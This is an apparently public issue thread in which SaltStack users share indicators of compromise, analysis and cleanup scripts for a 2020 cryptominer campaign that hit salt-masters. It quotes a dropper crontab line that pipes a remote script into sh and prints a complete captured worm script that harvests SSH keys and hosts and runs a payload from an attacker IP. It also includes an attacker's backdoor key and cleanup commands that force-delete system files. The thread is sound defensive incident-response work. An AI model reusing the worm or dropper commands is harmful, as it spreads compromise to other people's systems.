A small hint for those with "recurring" malware issues: if you have installed saltstack from your distribution repositories, the master may still be vulnerable. Right now there are no fixed versions in any of the official Ubuntu or Debian repositories. EPEL (there is no saltstack in CentOS directly) was last updated in 2016.
Personally, I'd just shutoff the salt-master, wait for a fixed version and put it back online afterwards. If this is a feasible solution.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
I couldn't access this link either. What's the correct Slack signup link?
OK the link worked this time.
Hi there. This one got me too. When I try to access https://saltstackcommunity.herokuapp.com/invite it says 'Not Found'. Would really appreciate some help recovering from this issue...
Everyone, I updated my message. Remove "invite" from the end of the link.
After entering your email. you may have to wait a moment to be accepted by the channel admins (I am not an admin).
New channel is #salt-store-miner-public . No need to DM me for permission anymore!
Cheers!
Found just now in a crontab:
wget -q -O - http://54.36.185.99/c.sh | sh > /dev/null 2>&1
Don't forget to check your crontabs!
cd /var/spool/cron/crontabs/ && grep . *
Note! The dropper appears to have been updated:
hxxp://89.223.121.139/sa.sh
The salt-store malware has been modified; the new MD5 hash is:
2c5cbc18d1796fd64f377c43175e79a3
Which is downloaded from:
hxxps://bitbucket.org/samk12dd/git/raw/master/salt_storer
hxxp://413628.selcdn.ru/cdn/salt-storer
Multiple people at this point have reported this user/repository to Atlassian's Bitbucket. I wish their support would react!
They took it down hours ago, actually.
I cannot stress enough how important it is that, if you're reading this thread now, you fix it NOW! The malware is improving in real-time. Join the slack channel (links above) for help removing it before it's too late!
Note: once you join, read this thread. It has nearly all the information I've gathered on the situation, and I am continuously updating it:
https://saltstackcommunity.slack.com/archives/C01354HKHMJ/p1588535319018000
If your system runs AppArmor, create two empty profiles, so it won't even be able to execute normally:
salt "*" cmd.run "echo 'profile salt-store /var/tmp/salt-store { }' | tee /etc/apparmor.d/salt-store"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-store"
salt "*" cmd.run "echo 'profile salt-minions /tmp/salt-minions { }' | tee /etc/apparmor.d/salt-minions"
salt "*" cmd.run "apparmor_parser -r -W /etc/apparmor.d/salt-minions"
@Talkless Thanks. The script does disable apparmor though, using a shell script run by salt-minion, so I don't think that will help unless you've already patched your salt-master and restarted it. And if you've done that, you'll also need to re-enable apparmor and delete the binaries anyway. Probably still worth doing!
Well of course.
The awesome part is, the official SaltStack docker repos don't have the fix pushed yet:
https://hub.docker.com/r/saltstack/salt/tags
Diffing a backup of /etc against the current /etc shows these two new files:
Only in /etc/: ld.so.cache
Only in /etc/selinux: config
what's the patch version for this fix?
There are official packages for 2019.2.x (2019.2.4) and 3000.x (3000.2).
There are also patches available for versions all the way back to 2015.8.10 found here:
https://www.saltstack.com/lp/request-patch-april-2020/
Could we have a public gist or something?
I have written this script to clean up most of the damage known to me:
https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6
Please note that this might not be complete and that, as Mike in Slack put it, the absence of known fingerprints at this point does not mean that affected hosts are secure.
This is working. @aTastyCookie Thank you very much.
I'm also wondering: having cleared these backdoors and upgraded/patched the master node, is there anything extra we should do?
It's worth being very clear about this -- if you had a Salt process running as root, an attacker effectively had root-level access to the system(s) in question. In this thread, there have been descriptions of known attacks but there may also be attacks circulating which do not match the same fingerprints as those so far described.
I emphasize that there is currently no evidence of this, but at a minimum, anyone affected by this exploit should consider information disclosure, remote back-doors, ransomware and other attack vectors as being _possible_ -- though, as mentioned, none of these have yet been seen or reported.
Critical Vulnerability in Salt Requires Immediate Patching
https://www.securityweek.com/critical-vulnerability-salt-requires-immediate-patching
You can test if your salt master needs to be patched like so:
curl -X POST -F 'ip=your.saltmaster.ip.address' https://saltexploit.com/test
If it does, it will create /tmp/HACKED.txt on your master (it will leave your minions alone and doesn't have any other side effects); if not, it won't.
😂 Letting a random site know the IP of your publicly exposed salt-master is a very very bad idea. Don't do that. If you have a public salt master, firewall it off the internet immediately.
If you want to verify whether you need to patch, do it offline with the check script from here: https://github.com/rossengeorgiev/salt-security-backports
Oh yeah I agree completely @rossengeorgiev . Don't trust me at all. Very bad idea. Don't do it. But it works xD
In all seriousness though, I am tying my reputation to not abusing that service, though. So yeah. I'm sure some in the slack channel can attest to that. Take that as you will. I promise I'm not keeping any IP addresses. Pinky swear? I did have 2 strangers in the slack channel audit me, but I can't offer any proof of that either, so...
Site has been updated to point to the offline checker and recommend that over the web one.
@here for anyone who is cleaning up their environment and is worried about potentially compromised salt pub/priv key pairs: https://github.com/dwoz/salt-rekey
We're putting together some information that should be released later today for those that need some help/don't already have a dedicated team.
In case it's not already obvious by this point:
When we get our post live we'll drop it here - in the interim, everyone has been amazing in the #salt-store-miner-public channel on the community Slack :black_heart: :black_heart: :black_heart: :black_heart:
Thanks @waynew. I'm continuing to update my gist and saltexploit.com with all the information I have.
FYI: We sacrificed one host as a honeypot to watch for further developments. There seems to be an update to the hack.
/tmp/salt-minions is now kept alive by scripts in /tmp/.ICEd-unix. Don't be fooled: /tmp/.ICE-unix is a valid directory.
There is also a script which, at first glance, tries to dig deeper into your infrastructure using your own SSH keys:
#!/bin/sh
localgo() {
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http://176.31.60.91/s2.sh|sh; sudo wget -q -O - http://176.31.60.91/s2.sh|sh;"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "curl -L http://176.31.60.91/s2.sh|sh; wget -q -O - http://176.31.60.91/s2.sh|sh;"
done
done
done
done
}
localgo
Hope it helps someone.
After looking further through one of my affected machines, a dropper script file was found. The script tries to find any SSH private keys and copy itself to any SSH hosts it finds in users' histories / ssh configs.
Both, the initial script, as well as the downloaded infection script, can be found in an impromptu repo I made: https://github.com/Aldenar/salt-malware-sources/tree/master
DO NOT run any of the scripts. They are live, and will infect your system!
@Aldenar this is a serious development. Where was this file placed?
It also adds a key to /root/.ssh/authorized_keys:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5MixCXoPdUXwM3IsGd2005bIgazuNL4Y5fxANuahqLia7w28hm9FoBYqkjNQ9JHFEyP0g3gFp94nZzw+mQSJPSeTPKBX0U9B1G4Pi/sTNVDknJjjiQ3sOmJ0AN8JLPC/5ID05h/vMISZ9N/dp36eLV1Z0xSUBC/bddglU3MtdWKI8QLQefQpi5v9tZ2bgBUPA+unsnRA6tn30S/3XS+E9kaE4oMz9P0Yg5aLYc7XMoDVdUSfP8u4LpG1ByLrqAB3cRrU0AndV++e+uBu61boQ5vACHhcqq66b+Vk+9JmvdlT+n+PbNwmJNcFwSLF12fFBoF/
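To check for that key fleet-wide (a sketch, run from a patched master; it only matches the beginning of the exact key pasted above, and you may need chattr -i on the file before you can remove the entry):
```
sudo salt -v '*' cmd.run 'grep -l "AAAAB3NzaC1yc2EAAAADAQABAAABAQDouxlPJjZxuIhntTaY5Mix" /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys 2>/dev/null'
```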
@Foobartender or @frenkye can you tell me what the full path of dropper is?
Hi guys, same issue here, with version 4 of the malware, see https://saltexploit.com/ and compare md5sum of /tmp/salt-minions.
Cleaned up with:
# Script taken from
# https://gist.github.com/itskenny0/df20bdb24a2f49b318a91195634ed3c6#file-cleanup-sh
# Crontab entries deleted, check only
sudo crontab -l | grep 'http://'
# sudo crontab -l | sed '/54.36.185.99/d' | sudo crontab -
# sudo crontab -l | sed '/217.8.117.137/d' | sudo crontab -
#
# Delete and kill malicious processes
sudo kill -9 $(pgrep salt-minions)
sudo kill -9 $(pgrep salt-store)
sudo rm -f /tmp/salt-minions
sudo rm -f /var/tmp/salt-store
sudo kill -9 $(pgrep -f ICEd)
sudo rm -rf /tmp/.ICE*
sudo rm -rf /var/tmp/.ICE*
sudo rm /root/.wget-hsts
# create apparmor profiles to prevent execution
echo 'profile salt-store /var/tmp/salt-store { }' | sudo tee /etc/apparmor.d/salt-store
sudo apparmor_parser -r -W /etc/apparmor.d/salt-store
echo 'profile salt-minions /tmp/salt-minions { }' | sudo tee /etc/apparmor.d/salt-minions
sudo apparmor_parser -r -W /etc/apparmor.d/salt-minions
# reenable nmi watchdog
sudo sysctl kernel.nmi_watchdog=1
echo '1' | sudo tee /proc/sys/kernel/nmi_watchdog
sudo sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
# disable hugepages
sudo sysctl -w vm.nr_hugepages=0
# enable apparmor
sudo systemctl enable apparmor
sudo systemctl start apparmor
# fix syslog
sudo touch /var/log/syslog
sudo systemctl restart rsyslog
I uploaded this script to a different web server and then ran a script similar to this example:
#!/bin/bash
ADDRESS=( 1.2.3.4
5.6.7.8
9.10.11.12
)
function my-ssh() {
ssh -i ~/.ssh/ec2.pem -l ubuntu $*
}
for server in ${ADDRESS[*]}
do
echo $server
my-ssh $server 'wget -q -O - https://myserver/kill_salt.sh | bash -x -v'
done
I found another script fetched from hxxp://176.104.3.35/?<id>: 1234.txt
@Foobartender is this file, exactly as you fetched it?
@taigrr It was in /tmp/.ICEd-unix/
The script had a completely random name. No suffix to indicate file type.
Putting patches behind some sort of sign-up wall requesting personal information isn't exactly classy. Just seems like a way to further annoy users after a major security issue.
@jblac No, I added two obvious lines on top for safety.
I analysed the malware a little, nothing spectacular. The salt-minions binary really seems to be just a Monero miner.
Here is the dropper script from the Cron job: hxxps://pastebin.com/UDykbnpU
A few DNS requests were made to pool.minexmr.com.
Here is a stack and heap dump of /tmp/salt-minions running in a sandboxed VM with the XMR wallet IDs and IP sockets: hxxps://pastebin.com/wue5zivp
And finally here a list of all Go source files: hxxps://pastebin.com/FMu6HfsK
The other one's much nastier.
Make sure to clean ALL crontabs in /var/spool/cron, not just the one of the root user.
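A quick way to sweep every user's crontab in one pass (a sketch; adjust the grep pattern to whatever indicators you care about):
```
# Dump each user's crontab and flag entries that fetch or run remote scripts.
for u in $(cut -d: -f1 /etc/passwd); do
  crontab -l -u "$u" 2>/dev/null | grep -E "wget|curl|http" | sed "s/^/$u: /"
done
```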
What would be "the other ones"?
Newer versions if you didn't get to it in time.
One's, not ones. I meant the salt-store remote shell. I dumped its memory as well, but nothing interesting popped up, since it doesn't have many hardcoded strings and is probably obfuscated. I could find a sorted array of ASCII characters. I did not perform any more detailed analysis of the disassembly, so the information is of limited value, but I posted it anyway just in case.
@taigrr - please add me to the Slack channel. Thank you for setting it up.
@sdreher
It's public, see saltexploit.com
https://github.com/saltstack/salt/issues/57088
For the people who still need to use SaltStack, but now temporarily lack confidence in it.
Here is the original sa.sh script that was downloaded onto our salt instance: https://file.io/h0dXR3W9
So, I've found some additional files that appear to be dropped.
On the salt-master:
/usr/local/lib/liblmvi.so (sha256:2984033766ce913cdf9b7ee92440e7e962b5cb5b90f7d1034f69837f724990ee)
It seems that virustotal doesn't detect it as bad.
It adds this path to /etc/ld.so.preload
On both the salt minions and the master I've also found that some of the dropped files can't be deleted due to the immutable attribute being set. This script helped to locate them:
lsattr -aR .//. 2>/dev/null | sed -rn '/i.+\.\/\/\./s/\.\/\///p'
In addition, I've also found /etc/hosts to be edited with additional entries for Bitbucket.
In case somebody needs this, I used these commands to do a quick fix on affected systems:
```
killall -9 salt-minions;
killall -9 salt-store;
rm -f /tmp/salt*;
rm -f /var/tmp/salt*;
rm /usr/bin/salt-store;
kill -9 $(pgrep -f ICEd);
rm -rf /tmp/.ICE*;
rm -rf /var/tmp/.ICE*;
rm /root/.wget-hsts;
sed -i '/bitbucket.org$/d' /etc/hosts;
rm /usr/local/lib/*.so; # as far as I know there should not be any legitimate *.so there, but check it before running
rm /etc/ld.so.preload;
ldconfig;
sed -i '/kernel.nmi_watchdog=0$/d' /etc/sysctl.conf;
rm /etc/selinux/config; # if you do not use a custom selinux config
touch /var/log/syslog;
service rsyslog restart;
rm /etc/salt/minion.d/_schedule.conf; # I never saw this mentioned before, but I found this file trying to periodically run salt
systemctl stop salt-minion;
rm -rf /etc/salt/pki/minion/; # need to regenerate salt keys
rm /var/tmp/rf /var/tmp/temp3754r97y12
```
Also check /etc/cron.d for strange files, usually with a random 4-5 letter name.
@MartinMystikJonas: please don't try to salvage systems at this point. Start fresh.
/etc/salt/minion.d/_schedule.conf: this file is fine. Please read the documentation if you're confused about what it is.
Everyone else: that helper script may be enough to help you calm down your CPU cycles enough to pull out data from your boxes (make the Cryptominer calm down for a bit) but please remember all your ssh keys and secrets were probably stolen, and you have no way to know what's lingering.
If you have any other questions, please visit saltexploit.com or visit the slack channel (directions also on saltexploit.com)
Hi @wavded,
Can you please share the path of the logs you mentioned? Appreciate it. Thanks.
Regards,
SC
@suhaimi-cyber4n6 it's on the salt-master. Look in the cachedir for saltstack (usually /var/cache/salt/master/jobs). Note that by default, salt only stores your jobs for 24 hours, so it may be too late to see your output by now.
Thank you very much @taigrr . I really appreciate it. :)
Sorry for being late to this game. Here is what I've seen on Linux. Your experience may differ. (I've proofread this a couple of times. I believe I've corrected my typos.)
I've seen two different processes, salt-minions (note the "s" at the end) and salt-store.
Check for these files in /tmp, /var/tmp and /usr/bin (/usr/bin/salt-minions can hide among the VALID /usr/bin/salt-minion files!)
Check your crontabs for two entries, likely the last two lines. These commands run every minute to pull down what I think is the installer and to restart salt-store.
* * * * * wget -q -O - http://<ip address>/<shortname>.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
Verify these are NOT YOURS, then remove or comment out as you would with any normal cron job.
If you are using systemd, run systemctl status salt-minion and examine the CGroup section. You will see your "systemctl" command in there; this is normal. You may see something like this running in tmp. The first number is the process ID (PID) number; I've omitted PIDs here.
sh -c /tmp/.ICEd-unix/<five random characters>
/tmp/.ICEd-unix/<same five random characters>
Note the d at the end of .ICEd in the malicious directory name. Be aware that /tmp/.ICE-unix is a valid directory name; please don't mess with that one, as I believe it handles X11 sessions!
This command will also list your valid /usr/bin/python /usr/bin/salt-minion sessions. You will likely see the malicious salt-minions (note the trailing S in minionS!) process.
For the experienced Unix/Linux administrators/users out there, this find command will quickly locate and print the extended attributes of the file listed after "-name". If you're not comfortable using find, skip it and look for the files manually.
find /tmp /var/tmp /usr/bin -type f -name salt-store -exec lsattr \{\} \; -print
If you're comfortable with find, you can change lsattr to chattr -i to remove the immutable flag. You can also change the file name to look for something other than salt-store.
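For example (double-check what the find matches before letting it change anything):
```
find /tmp /var/tmp /usr/bin -type f -name salt-store -exec chattr -i {} \; -print
```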
Found /usr/bin/salt-store on one server, MD5: 33140982ace71281c40d0dab0e9d69b8
https://www.virustotal.com/gui/file/98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c/community
It probably appeared late with the updates, because I found it only on one server.
Also mentioned (published) back in January 2020: CVE-2019-17361 (https://access.redhat.com/security/cve/cve-2019-17361)
@pretorianec-ua That is a different issue than the one being discussed in this thread.
Closing, as there likely isn't any new relevant information to be added here. If there is, please see our Community Slack channel #salt-store-miner-public.
Does the status "milestone approved" mean a fix is being worked on but not yet released? And is there a fix branch to follow?
@myloveecho This wasn't actually a bug in saltstack, but rather a report of evidence gathered regarding an exploit that used another bug, which was fixed several releases ago. There are patches available here.
You can also just upgrade to Sodium, which has the fixes already included.